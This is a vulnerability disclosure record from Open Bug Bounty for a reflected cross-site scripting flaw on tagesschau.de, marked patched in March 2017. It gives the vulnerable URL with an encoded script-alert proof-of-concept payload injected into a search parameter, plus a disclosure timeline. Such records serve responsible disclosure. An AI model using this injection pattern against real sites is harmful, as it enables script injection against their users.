tagesschau.de XSS vulnerability

2016-01-06T13:11:00
ID OBB:121870
Type openbugbounty
Reporter tbm
Modified 2017-03-11T05:43:00

Description

Vulnerable URL:
http://www.tagesschau.de/mehr/archiv/brennpunkt-archiv100.jsp?query=Suchbegriff&searchFormType;=%27%22%3E%3CScRiPt%20%3Ealert%28%27XSSPOSED%27%29%3C/ScRiPt%3E
Details:

Description| Value
---|---
Patched:| Yes, at 10.03.2017
Latest check for patch:| 10.03.2017 12:27 GMT
Vulnerability type:| XSS
Vulnerability status:| Publicly disclosed
Alexa Rank| 2223
Google Pagerank| 7
VIP website status:| Yes
Check tagesschau.de SSL connection:| (Grade: A)

Coordinated Disclosure Timeline:

Description| Value
---|---
Vulnerability reported| 6 January, 2016 13:11 GMT
Vulnerability existence verified and confirmed| 6 January, 2016 13:13 GMT
Vulnerability details disclosed by researcher| 22 June, 2016 14:11 GMT
Vulnerability patched by the website owner| 11 March, 2017 05:43 GMT